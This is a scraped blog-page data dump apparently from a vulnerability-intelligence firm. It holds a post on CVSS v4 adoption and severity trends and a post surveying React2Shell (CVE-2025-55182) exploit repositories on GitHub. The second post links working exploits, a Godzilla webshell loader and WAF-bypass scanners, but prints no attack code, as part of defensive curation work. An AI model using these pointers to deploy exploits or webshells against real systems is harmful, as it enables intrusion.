paths.",{"slug":21749},"react2shell-beyond-nextjs","\u002Fblog\u002Freact2shell-beyond-nextjs",{"title":21167,"description":21747},"blog\u002Freact2shell-beyond-nextjs",[242,1280,1279],"2yDJJ4ZVCJj1IztGmgHWgciuINTTPEO5-MtEpewnv3k",{"id":21756,"title":21757,"articles":21758,"authors":21766,"body":21768,"date":22024,"description":21772,"extension":234,"image":7,"link":7,"meta":22025,"navigation":237,"path":22027,"seo":22028,"series":7,"stem":22029,"subtype":7,"tags":22030,"__hash__":22032},"blog\u002Fblog\u002Fcvss-severity.md","Critical CVEs, CVSS v4, and the Adoption Gap No One Talks About",[21759,21762],{"title":21760,"source":3495,"link":21761,"date":20182},"Risky Bulletin: Belarus deploys spyware on journalists' phones","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-belarus-deploys-spyware-on-journalists-phones\u002F",{"title":21763,"source":14382,"link":21764,"date":21765},"⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fweekly-recap-firewall-exploits-ai-data.html","2025-12-22",[21767],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":21769,"toc":22015},[21770,21773,21776,21780,21783,21789,21792,21796,21799,21805,21808,21812,21815,21821,21824,21827,21831,21834,21840,21844,21847,21852,21856,21859,21993,21998,22001,22004,22006,22008,22010],[18,21771,21772],{},"A common topic that’s been brought to my attention on several occasions is the perceived increase in vulnerabilities deemed “Critical” by their CVSS severity. According to FIRST, CVSS severity ratings are intended to help organizations assess and prioritize vulnerability management efforts. With this in mind, I set out to explore CVSS severity trends over time, which ultimately led me to examine the impact and adoption of CVSS v4.",[18,21774,21775],{},"For this research, I used public data aggregated by VulnCheck from sources including NIST NVD, CISA, CVE Numbering Authorities, and vendor security advisories. I selected a single CVSS score for each published CVE, choosing the score associated with the most recent CVSS version available at the time.",[61,21777,21779],{"id":21778},"has-the-volume-of-critical-severity-vulnerabilities-increased-over-time","Has the Volume of Critical Severity Vulnerabilities Increased Over Time?",[18,21781,21782],{},"First, I examined CVSS severity by year to better understand how vulnerability volume is distributed across severity levels, using the most recent CVSS version available for each CVE. It is also worth noting that, at the time of this research, 2025 still had approximately three weeks remaining for CVE issuance.",[18,21784,21785],{},[68,21786],{":width":10862,"alt":21787,"src":21788},"Critical Vulnerabilities","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-by-year.png",[18,21790,21791],{},"At a glance, the volume of CVEs classified as Critical has remained relatively consistent over the past four years, with a slight dip observed in 2024 and 2025. In contrast, the number of Medium and Low severity CVEs has increased substantially. While this trend could still change as more CVEs are published, the proportion of Critical CVEs relative to the total number of vulnerabilities has clearly declined. In other words, there are significantly more CVEs overall, but proportionally fewer Critical and High severity issues.",[61,21793,21795],{"id":21794},"could-cvss-v4-be-a-contributor-to-the-slight-dip-in-critical-cves","Could CVSS v4 be a Contributor to the Slight Dip in Critical CVEs?",[18,21797,21798],{},"With CVSS v4 having been publicly available for roughly two years, I wanted to explore whether it may be contributing to the slight decline in Critical CVEs.",[18,21800,21801],{},[68,21802],{":width":10862,"alt":21803,"src":21804},"Critical Versions","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-by-version.png",[18,21806,21807],{},"To do this, I mapped CVSS severity by scoring version to identify any meaningful differences in severity distribution. The data shows a notable reduction in the percentage of CVEs scored as Critical or High under CVSS v4 compared to earlier versions.",[61,21809,21811],{"id":21810},"could-there-be-a-cvss-v4-outlier","Could There be a CVSS v4 Outlier?",[18,21813,21814],{},"To better understand the cause of this apparent shift, I took a deeper look at the CVEs scored using CVSS v4. What quickly became apparent is that 49% of CVEs with a CVSS v4 score were published by VulDB, which disproportionately influences the overall CVSS v4 dataset.",[18,21816,21817],{},[68,21818],{":width":10862,"alt":21819,"src":21820},"Critical Outlier","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-outlier.png",[18,21822,21823],{},"When CVEs published by vulDB are excluded, the resulting severity distribution aligns much more closely with CVSS v3 and v3.1. This raised the question: what is unique about VulDB’s use of CVSS v4?",[18,21825,21826],{},"The primary difference appears to be the consistent use of Subsequent System Impact Metrics set to None (N). This choice, which could be for good reason such as limited visibility into SSI or limitations in the ability to automate this, results in lower overall CVSS v4 severity scores for nearly all affected CVEs.",[61,21828,21830],{"id":21829},"what-adoption-is-there-of-cvss-v4-across-cves-published-in-2025","What Adoption is there of CVSS v4 Across CVEs published in 2025?",[18,21832,21833],{},"More than two years after the publication of the CVSS v4 specification, only 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score.",[18,21835,21836],{},[68,21837],{":width":10862,"alt":21838,"src":21839},"CVSS Version","\u002Fblog\u002Fcvss-severity\u002Fcves-by-cvss-version.png",[61,21841,21843],{"id":21842},"who-is-enriching-cve-records-with-cvss-v4-scores","Who is enriching CVE records with CVSS v4 Scores?",[18,21845,21846],{},"Next, I examined who is contributing CVSS v4 scores. In total, 232 distinct sources have published or enriched CVEs with CVSS v4 data. While this represents a reasonable foundation after two years, a larger issue remains: historically dominant enrichment sources including NIST NVD and CISA ADP, are rarely publishing CVSS v4 scores.",[18,21848,21849],{},[68,21850],{":width":10862,"alt":21838,"src":21851},"\u002Fblog\u002Fcvss-severity\u002Fcvss-v4-source.png",[61,21853,21855],{"id":21854},"what-major-cvss-contributors-arent-enriching-cve-records-with-cvss-v4-scores-in-2025","What Major CVSS contributors aren’t enriching CVE records with CVSS v4 Scores in 2025?",[18,21857,21858],{},"This led me to examine which major CVSS contributors have not adopted CVSS v4 in 2025. I analyzed CVSS sources by volume to identify organizations that scored large numbers of CVEs without providing a CVSS v4 score. The table below highlights the top 15 such sources.",[307,21860,21861,21871],{},[310,21862,21863],{},[313,21864,21865,21868],{},[316,21866,21867],{},"CVSS Source",[316,21869,21870],{},"# of CVEs Scored w\u002Fo CVSS v4",[336,21872,21873,21881,21889,21897,21905,21913,21921,21929,21937,21945,21953,21961,21969,21977,21985],{},[313,21874,21875,21878],{},[341,21876,21877],{},"CISA-ADP",[341,21879,21880],{},"7269",[313,21882,21883,21886],{},[341,21884,21885],{},"NIST",[341,21887,21888],{},"7254",[313,21890,21891,21894],{},[341,21892,21893],{},"Patchstack",[341,21895,21896],{},"5309",[313,21898,21899,21902],{},[341,21900,21901],{},"Wordfence",[341,21903,21904],{},"2521",[313,21906,21907,21910],{},[341,21908,21909],{},"Redhat",[341,21911,21912],{},"1757",[313,21914,21915,21918],{},[341,21916,21917],{},"Microsoft Corporation",[341,21919,21920],{},"1071",[313,21922,21923,21926],{},[341,21924,21925],{},"GitHub, Inc.",[341,21927,21928],{},"933*",[313,21930,21931,21934],{},[341,21932,21933],{},"Adobe Systems Incorporated",[341,21935,21936],{},"637",[313,21938,21939,21942],{},[341,21940,21941],{},"MITRE",[341,21943,21944],{},"413",[313,21946,21947,21950],{},[341,21948,21949],{},"ZDI",[341,21951,21952],{},"316",[313,21954,21955,21958],{},[341,21956,21957],{},"IBM Corporation",[341,21959,21960],{},"313",[313,21962,21963,21966],{},[341,21964,21965],{},"Oracle",[341,21967,21968],{},"312",[313,21970,21971,21974],{},[341,21972,21973],{},"Qualcomm, Inc.",[341,21975,21976],{},"212",[313,21978,21979,21982],{},[341,21980,21981],{},"Cisco Systems, Inc.",[341,21983,21984],{},"189",[313,21986,21987,21990],{},[341,21988,21989],{},"SAP SE",[341,21991,21992],{},"185",[22,21994,21995],{},[25,21996,21997],{},"GitHub has started adopting CVSS v4 in 2025 w\u002F 1153 CVEs scored with CVSS v4",[18,21999,22000],{},"What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers. Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.",[18,22002,22003],{},"As a result, perceived changes in severity trends, particularly around “Critical” CVEs, are more likely influenced by partial adoption and subjective scoring practices than by inherent changes introduced by the CVSS v4 specification itself. That said, the relatively limited volume of CVSS v4 scoring still makes it difficult to fully assess the true impact of CVSS v4 on severity distribution.",[61,22005,202],{"id":201},[18,22007,205],{},[18,22009,208],{},[18,22011,211,22012,217],{},[47,22013,216],{"href":214,"rel":22014},[51],{"title":219,"searchDepth":220,"depth":220,"links":22016},[22017,22018,22019,22020,22021,22022,22023],{"id":21778,"depth":220,"text":21779},{"id":21794,"depth":220,"text":21795},{"id":21810,"depth":220,"text":21811},{"id":21829,"depth":220,"text":21830},{"id":21842,"depth":220,"text":21843},{"id":21854,"depth":220,"text":21855},{"id":201,"depth":220,"text":202},"2025-12-15",{"slug":22026},"cvss-severity","\u002Fblog\u002Fcvss-severity",{"title":21757,"description":21772},"blog\u002Fcvss-severity",[1280,242,22031],"cvss","WJSmDGVSC7fsIF-sT_tl-KqpfJEDoqUhm_yQZv5qwz4",{"id":22034,"title":21701,"articles":22035,"authors":22044,"body":22046,"date":22039,"description":22703,"extension":234,"image":7,"link":7,"meta":22704,"navigation":237,"path":22706,"seo":22707,"series":7,"stem":22708,"subtype":7,"tags":22709,"__hash__":22711},"blog\u002Fblog\u002Freact2shell-github.md",[22036,22040],{"title":22037,"source":11218,"link":22038,"date":22039},"React2Shell Exploits Flood the Internet as Attacks Continue","https:\u002F\u002Fwww.darkreading.com\u002Fthreat-intelligence\u002Freact2shell-exploits-flood-internet-attacks-continue","2025-12-12",{"title":22041,"source":22042,"link":22043,"date":21746},"Nation-State and Cybercrime Exploits Tied to React2Shell","ISMG","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fnation-state-cybercrime-exploits-tied-to-react2shell-a-30285",[22045],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":22047,"toc":22695},[22048,22051,22055,22063,22070,22077,22092,22096,22100,22104,22107,22111,22115,22118,22141,22144,22148,22152,22155,22168,22177,22181,22202,22219,22234,22248,22251,22279,22283,22291,22298,22305,22631,22634,22638,22641,22644,22646,22672,22692],[263,22049],{":list":22050,"ico":266,"title":20},"[\"React2Shell triggered a surge of fake, broken, or misleading exploits on GitHub, and the platform’s decentralized model means almost none of that noise is moderated or cleaned up for the public good.\",\"Buried in that noise were genuinely interesting ideas, including in-memory webshells and creative payload variations, that deserve more attention from defenders than they received.\",\"VulnCheck reviews public exploit repositories, separates signal from noise, and publishes the curated React2Shell dataset for free for anyone who wants to explore it.\"]",[61,22052,22054],{"id":22053},"the-react2shell-exploit-surge","The React2Shell Exploit Surge",[18,22056,22057,22058,22062],{},"At VulnCheck, one of the more Sisyphean tasks our exploit dev team handles is reviewing the constant stream of “exploits” published to developer platforms like GitHub, GitLab, and Gitee. The volume of fake, broken, malicious, and (especially lately) AI-generated slop pretending to be real exploit code is staggering. But it’s also exactly why this work matters. If no one separates signal from noise, defenders and researchers are left with a polluted ecosystem. So for our customers and the broader community, we manually review every exploit before it’s folded into our product and the community-available ",[47,22059,22061],{"href":11516,"rel":22060},[51],"VulnCheck Exploit Database"," (XDB).",[18,22064,22065],{},[68,22066],{"alt":22067,"src":22068,"style":22069},"Live shot of the team maintaining the exploit moderation queue","\u002Fblog\u002Freact2shell-github\u002Fthe-queue.png","width: 40%; height: auto; margin-left: auto; margin-right: auto;",[18,22071,22072,22073,22076],{},"The volume of ",[47,22074,10533],{"href":10531,"rel":22075},[51]," (React2Shell) exploits has been staggering, easily outpacing anything we have had to review before. By noon on December 10, 2025, we had approved 128 GitHub exploits and blocked 127 more. A brutal ratio, but an honest reflection of what gets published during a high-profile CVE.",[18,22078,22079,22080,22085,22086,22091],{},"For those unfamiliar with the saga, the first wave of React2Shell activity was almost entirely useless AI-generated exploits published after the CVE dropped on December 3, 2025. Everything shifted on the afternoon of December 4, when ",[47,22081,22084],{"href":22082,"rel":22083},"https:\u002F\u002Fgist.github.com\u002Fmaple3142",[51],"maple3142"," published a working proof-of-concept ",[47,22087,22090],{"href":22088,"rel":22089},"https:\u002F\u002Fgist.github.com\u002Fmaple3142\u002F48bc9393f45e068cf8c90ab865c0f5f3",[51],"Gist",". That single PoC flipped the ecosystem from AI noise to genuine exploit development, and the pace immediately accelerated. We were approving new variants steadily, with developers continuing to publish refinements through the weekend of December 6 and 7.",[14603,22093,22095],{"id":22094},"approved-github-exploits-by-publication-date","Approved GitHub Exploits By Publication Date",[11128,22097],{":labels":22098,":values":22099},"[\"2025-12-04\",\"2025-12-05\",\"2025-12-06\",\"2025-12-07\",\"2025-12-08\",\"2025-12-09\",\"2025-12-10\"]","[3,19,26,23,27,19,11]",[61,22101,22103],{"id":22102},"what-vulncheck-saw-in-the-data","What VulnCheck Saw in the Data",[18,22105,22106],{},"Naturally, no one is going to review all 128 exploits. A small number get attention, and the rest disappear into the GitHub void. We track star counts to help customers surface the popular ones, and the numbers speak for themselves: 72 repositories have zero stars, and 21 have just one. In most high-profile CVEs, the meaningful work quickly separates itself from the long tail of clones and noise, and React2Shell followed that pattern exactly.",[14603,22108,22110],{"id":22109},"number-of-react2shell-repositories-by-star-count","Number of React2Shell Repositories By Star Count",[11128,22112],{":labels":22113,":values":22114},"[0,1,2,3,4,5,7,10,12,14,18,19,24,34,55,86,88,238,787,1120]","[73,21,9,4,1,2,3,2,1,2,1,1,1,1,1,1,1,1,1,1]",[18,22116,22117],{},"If you go by star count, only a handful of repositories stand out, and three sit clearly above the rest. These are the exploits that most people saw first and that shaped much of the subsequent development:",[1789,22119,22120,22127,22134],{},[25,22121,22122,22126],{},[47,22123,22124],{"href":22124,"rel":22125},"https:\u002F\u002Fgithub.com\u002Fmsanft\u002FCVE-2025-55182",[51],": One of the earliest public exploits. It now includes a solid writeup and a Python-based implementation.",[25,22128,22129,22133],{},[47,22130,22131],{"href":22131,"rel":22132},"https:\u002F\u002Fgithub.com\u002Flachlan2k\u002FReact2Shell-CVE-2025-55182-original-poc",[51],": Exploits developed by the original bug finder, with three JavaScript variants.",[25,22135,22136,22140],{},[47,22137,22138],{"href":22138,"rel":22139},"https:\u002F\u002Fgithub.com\u002Fzack0x01\u002FCVE-2025-55182-advanced-scanner-",[51],": A straightforward bash-based scanner.",[18,22142,22143],{},"Interestingly, the three most popular repositories are each written in different languages: Python, JavaScript, and bash. That mix reflects not only the range of developers experimenting with React2Shell, but also the simplicity of the underlying exploit, which makes it easy to reimplement in whatever language someone prefers. This pattern shows up clearly in the overall language distribution.",[14603,22145,22147],{"id":22146},"repository-count-vs-language","Repository Count vs. Language",[11128,22149],{":labels":22150,":values":22151},"[\"Python\",\"JavaScript\",\"Shell\",\"Go\",\"TypeScript\",\"Lua\",\"Rust\",\"Perl\",\"Dockerfile\"]","[68,16,13,7,6,4,3,1,1]",[18,22153,22154],{},"Python dominating the scene is unsurprising. Most public “exploit development” is done by security “researchers” who can barely cobble together a Python script and want nothing to do with C, C++, or nontrivial JavaScript.",[18,22156,22157,22158,22162,22163,22167],{},"The language distribution still has a few interesting quirks. The repositories marked “Lua,” for example, are all Nmap NSE scripts, such as this one: ",[47,22159,22160],{"href":22160,"rel":22161},"https:\u002F\u002Fgithub.com\u002Fyunaranyancat\u002FCVE-2025-55182-NSE\u002Fblob\u002Fmain\u002FCVE-2025-55182.nse",[51],". Because Nmap already provides mass scanning and reporting capabilities, these scripts can be more practical in real-world operations than generic Python PoCs. This particular NSE script also mirrors behaviors ",[47,22164,22166],{"href":21690,"rel":22165},[51],"we have seen"," in our Canary Intelligence data, including the hardcoded multipart boundary `----WebKitFormBoundaryx8jO2oVc6SWP3Sad`, PowerShell and echo-based math checks, and the Assetnote User-Agent. Seeing public PoCs align so closely with attacker behavior is unusual and noteworthy.",[18,22169,22170,22171,22176],{},"Another oddity is a repository marked as “Dockerfile.” It contains a Dockerfile that builds a vulnerable environment and a docker-compose file for running it, which normally wouldn’t qualify it as an exploit. However, the repository also includes a ",[47,22172,22175],{"href":22173,"rel":22174},"https:\u002F\u002Fgithub.com\u002FCharlesTheGreat77\u002FCVE-2025-55182-Test-Server\u002Fblob\u002Fmain\u002Freact-rsc-rce.yaml",[51],"Nuclei"," template that actively exercises the vulnerable behavior to determine whether the issue is present. Tools like this sit in an odd space: they are not “exploits” in the traditional sense because they do not achieve code execution, but they go beyond simple version checks. We categorize this kind of entry as an “infoleak,” a very small slice of the vulnerabilities we track.",[61,22178,22180],{"id":22179},"noteworthy-exploits-and-why-they-matter","Noteworthy Exploits (and Why They Matter)",[18,22182,22183,22184,22189,22190,22195,22196,22201],{},"Some of the most interesting repositories don’t stand out in any graph but are absolutely worth calling out. One example is a ",[47,22185,22188],{"href":22186,"rel":22187},"https:\u002F\u002Fgithub.com\u002FBeichenDream\u002FCVE-2025-55182-GodzillaMemoryShell\u002F",[51],"repository"," published on December 10 that includes logic for loading the ",[47,22191,22194],{"href":22192,"rel":22193},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fjsp.godzilla_webshell",[51],"Godzilla"," webshell onto affected systems. Godzilla is a weaponized in-memory webshell widely used by real ",[47,22197,22200],{"href":22198,"rel":22199},"https:\u002F\u002Fwww.hhs.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fnovember-2024%E2%80%93godzilla-webshell-analyst-note.pdf",[51],"attackers",", and in-memory shells are especially dangerous because they do not touch disk and evade many traditional detection techniques.",[18,22203,22204,22205,22212,22213,22218],{},"A public proof of concept that deploys Godzilla all but guarantees we will see this technique used in the wild. We have seen this pattern before. In our ",[47,22206,22209],{"href":22207,"rel":22208},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fconfluence-dreams-of-shells",[51],[1131,22210,22211],{},"Does Confluence Dream of Shells?"," research, we documented how ",[47,22214,22217],{"href":22215,"rel":22216},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-22527",[51],"CVE-2023-22527"," proofs of concept loaded Godzilla-style in-memory shells and influenced real exploit behavior, and the same dynamics are at play here.",[18,22220,22221,22222,22227,22228,22233],{},"The Godzilla loader was not the only interesting in-memory work to appear. In fact, the first in-memory webshell implementation we saw was in the ",[47,22223,22226],{"href":22224,"rel":22225},"https:\u002F\u002Fgithub.com\u002FMalayke\u002FNext.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#-runtime-memory-shell-",[51],"Malyke"," repository, which documented several Next.js exploit variants and included its own in-memory shell. We ",[47,22229,22232],{"href":22230,"rel":22231},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2025-55182",[51],"published"," a Go-based variant during our analysis so we could better understand how defenders might attempt to detect the attack.",[18,22235,22236,22237,22241,22242,22247],{},"Another ",[47,22238,22188],{"href":22239,"rel":22240},"https:\u002F\u002Fgithub.com\u002Faiexz\u002FCVE-2025-66478-kinda-waf\u002F",[51],", by ",[47,22243,22246],{"href":22244,"rel":22245},"https:\u002F\u002Fgithub.com\u002Faiexz",[51],"aiexz",", went in a very different direction. Instead of installing a webshell, it deployed a lightweight WAF to block React2Shell payloads entirely. It is an unexpected but clever twist: using the vulnerability to defend against the vulnerability.",[18,22249,22250],{},"There are other interesting repositories that deserve callouts:",[1789,22252,22253,22260,22272],{},[25,22254,22255,22259],{},[47,22256,22257],{"href":22257,"rel":22258},"https:\u002F\u002Fgithub.com\u002FLegus-Yeung\u002FCVE-2025-55182-exploit\u002F",[51],": This one does not attempt RCE at all. Instead, it leaks environment variables, which is a valuable primitive in many real-world attacks.",[25,22261,22262,22266,22267,59],{},[47,22263,22264],{"href":22264,"rel":22265},"https:\u002F\u002Fgithub.com\u002Fhackersatyamrastogi\u002Freact2shell-ultimate\u002F",[51],": The “ultimate” scanner. It packs an impressive number of features into 1700 lines of Python, including the “large blob of data” WAF bypass, and even has its own ",[47,22268,22271],{"href":22269,"rel":22270},"https:\u002F\u002Fwww.react2shellscanner.com\u002F",[51],"website",[25,22273,22274,22278],{},[47,22275,22276],{"href":22276,"rel":22277},"https:\u002F\u002Fgithub.com\u002Fpyroxenites\u002FNextjs_RCE_Exploit_Tool\u002F",[51],": A GUI-based tool by a Chinese-language developer, complete with a built-in Unicode-based WAF bypass.",[61,22280,22282],{"id":22281},"accessing-the-data-yourself","Accessing the Data Yourself",[18,22284,22285,22286,22290],{},"If you want to see the data behind all of this, you can. VulnCheck’s ",[47,22287,22289],{"href":11516,"rel":22288},[51],"XDB"," is public and free, and it contains every React2Shell exploit that survived moderation. If you would like to browse the curated set, you can search for CVE-2025-55182:",[18,22292,22293],{},[68,22294],{"alt":22295,"src":22296,"style":22297},"XDB Example","\u002Fblog\u002Freact2shell-github\u002Fxdb-results.png","width: 100%; height: auto; margin-left: auto; margin-right: auto;",[18,22299,22300,22301,4606],{},"If you create a free account, our VulnCheck KEV will also show you the associated XDB entries for each CVE. This makes it easy to move from vulnerability information to the curated exploit set. Here is a small snippet from the KEV API for ",[47,22302,10533],{"href":22303,"rel":22304},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2025-55182",[51],[1354,22306,22310],{"className":22307,"code":22308,"language":22309,"meta":219,"style":219},"language-json shiki shiki-themes material-theme-lighter github-light github-dark monokai","\"vulncheck_xdb\": [\n{\n \"xdb_id\": \"b5a20e095cc3\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb5a20e095cc3\",\n \"date_added\": \"2025-12-04T11:49:55Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:msanft\u002FCVE-2025-55182.git\"\n},\n{\n \"xdb_id\": \"2caf5e7a5d9b\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2caf5e7a5d9b\",\n \"date_added\": \"2025-12-04T14:49:43Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:acheong08\u002FCVE-2025-55182-poc.git\"\n},\n{\n \"xdb_id\": \"b3583e9145ea\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb3583e9145ea\",\n \"date_added\": \"2025-12-04T17:18:42Z\",\n \"exploit_type\": \"infoleak\",\n \"clone_ssh_url\": \"git@github.com:klassiker\u002FCVE-2025-55182.git\"\n},\n","json",[886,22311,22312,22325,22329,22349,22369,22388,22407,22425,22430,22434,22453,22472,22491,22509,22526,22530,22534,22553,22572,22591,22610,22627],{"__ignoreMap":219},[1373,22313,22314,22316,22319,22321,22323],{"class":1375,"line":1376},[1373,22315,183],{"class":1387},[1373,22317,22318],{"class":1391},"vulncheck_xdb",[1373,22320,183],{"class":1387},[1373,22322,20051],{"class":4640},[1373,22324,9050],{"class":1383},[1373,22326,22327],{"class":1375,"line":220},[1373,22328,8904],{"class":1383},[1373,22330,22331,22333,22336,22338,22340,22342,22345,22347],{"class":1375,"line":1266},[1373,22332,19050],{"class":9152},[1373,22334,22335],{"class":9155},"xdb_id",[1373,22337,183],{"class":9152},[1373,22339,4606],{"class":1383},[1373,22341,4883],{"class":9173},[1373,22343,22344],{"class":9176},"b5a20e095cc3",[1373,22346,183],{"class":9173},[1373,22348,9062],{"class":1383},[1373,22350,22351,22353,22356,22358,22360,22362,22365,22367],{"class":1375,"line":1852},[1373,22352,19050],{"class":9152},[1373,22354,22355],{"class":9155},"xdb_url",[1373,22357,183],{"class":9152},[1373,22359,4606],{"class":1383},[1373,22361,4883],{"class":9173},[1373,22363,22364],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb5a20e095cc3",[1373,22366,183],{"class":9173},[1373,22368,9062],{"class":1383},[1373,22370,22371,22373,22375,22377,22379,22381,22384,22386],{"class":1375,"line":4692},[1373,22372,19050],{"class":9152},[1373,22374,12998],{"class":9155},[1373,22376,183],{"class":9152},[1373,22378,4606],{"class":1383},[1373,22380,4883],{"class":9173},[1373,22382,22383],{"class":9176},"2025-12-04T11:49:55Z",[1373,22385,183],{"class":9173},[1373,22387,9062],{"class":1383},[1373,22389,22390,22392,22395,22397,22399,22401,22403,22405],{"class":1375,"line":4724},[1373,22391,19050],{"class":9152},[1373,22393,22394],{"class":9155},"exploit_type",[1373,22396,183],{"class":9152},[1373,22398,4606],{"class":1383},[1373,22400,4883],{"class":9173},[1373,22402,1281],{"class":9176},[1373,22404,183],{"class":9173},[1373,22406,9062],{"class":1383},[1373,22408,22409,22411,22414,22416,22418,22420,22423],{"class":1375,"line":4756},[1373,22410,19050],{"class":9152},[1373,22412,22413],{"class":9155},"clone_ssh_url",[1373,22415,183],{"class":9152},[1373,22417,4606],{"class":1383},[1373,22419,4883],{"class":9173},[1373,22421,22422],{"class":9176},"git@github.com:msanft\u002FCVE-2025-55182.git",[1373,22424,19057],{"class":9173},[1373,22426,22427],{"class":1375,"line":4768},[1373,22428,22429],{"class":1383},"},\n",[1373,22431,22432],{"class":1375,"line":4792},[1373,22433,8904],{"class":1383},[1373,22435,22436,22438,22440,22442,22444,22446,22449,22451],{"class":1375,"line":4798},[1373,22437,19050],{"class":9152},[1373,22439,22335],{"class":9155},[1373,22441,183],{"class":9152},[1373,22443,4606],{"class":1383},[1373,22445,4883],{"class":9173},[1373,22447,22448],{"class":9176},"2caf5e7a5d9b",[1373,22450,183],{"class":9173},[1373,22452,9062],{"class":1383},[1373,22454,22455,22457,22459,22461,22463,22465,22468,22470],{"class":1375,"line":4806},[1373,22456,19050],{"class":9152},[1373,22458,22355],{"class":9155},[1373,22460,183],{"class":9152},[1373,22462,4606],{"class":1383},[1373,22464,4883],{"class":9173},[1373,22466,22467],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2caf5e7a5d9b",[1373,22469,183],{"class":9173},[1373,22471,9062],{"class":1383},[1373,22473,22474,22476,22478,22480,22482,22484,22487,22489],{"class":1375,"line":4817},[1373,22475,19050],{"class":9152},[1373,22477,12998],{"class":9155},[1373,22479,183],{"class":9152},[1373,22481,4606],{"class":1383},[1373,22483,4883],{"class":9173},[1373,22485,22486],{"class":9176},"2025-12-04T14:49:43Z",[1373,22488,183],{"class":9173},[1373,22490,9062],{"class":1383},[1373,22492,22493,22495,22497,22499,22501,22503,22505,22507],{"class":1375,"line":4825},[1373,22494,19050],{"class":9152},[1373,22496,22394],{"class":9155},[1373,22498,183],{"class":9152},[1373,22500,4606],{"class":1383},[1373,22502,4883],{"class":9173},[1373,22504,1281],{"class":9176},[1373,22506,183],{"class":9173},[1373,22508,9062],{"class":1383},[1373,22510,22511,22513,22515,22517,22519,22521,22524],{"class":1375,"line":4835},[1373,22512,19050],{"class":9152},[1373,22514,22413],{"class":9155},[1373,22516,183],{"class":9152},[1373,22518,4606],{"class":1383},[1373,22520,4883],{"class":9173},[1373,22522,22523],{"class":9176},"git@github.com:acheong08\u002FCVE-2025-55182-poc.git",[1373,22525,19057],{"class":9173},[1373,22527,22528],{"class":1375,"line":4843},[1373,22529,22429],{"class":1383},[1373,22531,22532],{"class":1375,"line":4849},[1373,22533,8904],{"class":1383},[1373,22535,22536,22538,22540,22542,22544,22546,22549,22551],{"class":1375,"line":4877},[1373,22537,19050],{"class":9152},[1373,22539,22335],{"class":9155},[1373,22541,183],{"class":9152},[1373,22543,4606],{"class":1383},[1373,22545,4883],{"class":9173},[1373,22547,22548],{"class":9176},"b3583e9145ea",[1373,22550,183],{"class":9173},[1373,22552,9062],{"class":1383},[1373,22554,22555,22557,22559,22561,22563,22565,22568,22570],{"class":1375,"line":4915},[1373,22556,19050],{"class":9152},[1373,22558,22355],{"class":9155},[1373,22560,183],{"class":9152},[1373,22562,4606],{"class":1383},[1373,22564,4883],{"class":9173},[1373,22566,22567],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb3583e9145ea",[1373,22569,183],{"class":9173},[1373,22571,9062],{"class":1383},[1373,22573,22574,22576,22578,22580,22582,22584,22587,22589],{"class":1375,"line":4931},[1373,22575,19050],{"class":9152},[1373,22577,12998],{"class":9155},[1373,22579,183],{"class":9152},[1373,22581,4606],{"class":1383},[1373,22583,4883],{"class":9173},[1373,22585,22586],{"class":9176},"2025-12-04T17:18:42Z",[1373,22588,183],{"class":9173},[1373,22590,9062],{"class":1383},[1373,22592,22593,22595,22597,22599,22601,22603,22606,22608],{"class":1375,"line":4947},[1373,22594,19050],{"class":9152},[1373,22596,22394],{"class":9155},[1373,22598,183],{"class":9152},[1373,22600,4606],{"class":1383},[1373,22602,4883],{"class":9173},[1373,22604,22605],{"class":9176},"infoleak",[1373,22607,183],{"class":9173},[1373,22609,9062],{"class":1383},[1373,22611,22612,22614,22616,22618,22620,22622,22625],{"class":1375,"line":4952},[1373,22613,19050],{"class":9152},[1373,22615,22413],{"class":9155},[1373,22617,183],{"class":9152},[1373,22619,4606],{"class":1383},[1373,22621,4883],{"class":9173},[1373,22623,22624],{"class":9176},"git@github.com:klassiker\u002FCVE-2025-55182.git",[1373,22626,19057],{"class":9173},[1373,22628,22629],{"class":1375,"line":6776},[1373,22630,22429],{"class":1383},[18,22632,22633],{},"This brings us to the bigger picture. React2Shell is not just a high-volume CVE, but a reflection of several trends we have been seeing in the public exploit ecosystem.",[61,22635,22637],{"id":22636},"what-react2shell-teaches-us","What React2Shell Teaches Us",[18,22639,22640],{},"React2Shell produced an enormous volume of public exploit repositories. About half of what we reviewed was broken, misleading, or otherwise unusable. Without curation, the meaningful material quickly gets buried by the noise.",[18,22642,22643],{},"Even so, there were genuinely interesting ideas in the mix: in-memory shells, creative payload variations, scanners with real capability, and even defensive uses of the vulnerability. The challenge is simply finding them. That is why we invest so much effort into reviewing public exploits and publishing the approved set. The curated React2Shell dataset is available in XDB for free, if you want to explore it 